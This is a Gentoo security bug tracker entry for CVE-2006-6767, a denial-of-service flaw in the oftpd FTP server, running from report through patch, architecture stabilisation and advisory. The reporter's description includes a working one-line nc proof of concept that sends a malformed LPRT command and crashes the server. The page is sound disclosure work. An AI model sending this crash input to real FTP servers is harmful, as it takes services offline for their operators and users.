Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 159178 - net-ftp/oftpd: denial of service CVE-2006-6767
Summary: net-ftp/oftpd: denial of service CVE-2006-6767
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: High normal (vote)
Assignee: Gentoo Security
URL:
Whiteboard: B3? [glsa]
Keywords:
Depends on:
Blocks:
 
Reported: 2006-12-26 17:30 UTC by Tavis Ormandy (RETIRED)
Modified: 2007-02-11 10:24 UTC (History)
3 users (show)

See Also:
Package list:
Runtime testing required: ---

Attachments
lprt assertion patch (oftpd.diff,550 bytes, patch)
2006-12-27 03:40 UTC, Tavis Ormandy (RETIRED) 		no flags Details | Diff
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Tavis Ormandy (RETIRED) gentoo-dev 2006-12-26 17:30:32 UTC 
If you send an LPRT with an address family that is != 4 or 6, oftpd will die.

$ nc localhost 21 <<< "LPRT 1,16,63,254,47,0,0,32,0,0,0,0,0,0,32,254,143,205,2,141,176"
220 Service ready for new user.
521 Only IPv4 supported, address family (4)
$ nc localhost 21 
localhost [127.0.0.1] 21 (ftp) : Connection refused
Comment 1 Tavis Ormandy (RETIRED) gentoo-dev 2006-12-27 03:40:58 UTC 
Created attachment 104795 [details, diff]
lprt assertion patch

simple patch that ssolves this problem for me.
Comment 2 Tavis Ormandy (RETIRED) gentoo-dev 2006-12-29 02:58:18 UTC 
eradicator: please provide an updated ebuild
Comment 3 Roy Marples (RETIRED) gentoo-dev 2007-01-04 04:39:18 UTC 
-r3 added to portage with attached patch. Thanks.
Comment 4 Tavis Ormandy (RETIRED) gentoo-dev 2007-01-04 04:49:24 UTC 
Arches: please test and mark stable net-ftp/oftpd-0.3.7-r3

target KEYWORDS="amd64 arm ppc64 sh sparc x86"
Comment 5 Timothy Redaelli (RETIRED) gentoo-dev 2007-01-04 06:00:39 UTC 
nothing to do
Comment 6 Gustavo Zacarias (RETIRED) gentoo-dev 2007-01-04 11:22:54 UTC 
sparc stable.
Comment 7 Tom Gall (RETIRED) gentoo-dev 2007-01-04 21:18:29 UTC 
stable on ppc64
Comment 8 Christian Faulhammer (RETIRED) gentoo-dev 2007-01-05 00:30:37 UTC 
x86 stable
Comment 9 Steve Dibb (RETIRED) gentoo-dev 2007-01-05 06:18:18 UTC 
amd64 stable
Comment 10 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-01-14 20:47:00 UTC 
I vote for a GLSA.
Comment 11 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-01-14 23:03:42 UTC 
tavis votes yes
Comment 12 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-01-15 23:03:57 UTC 
GLSA 200701-09, thanks everybody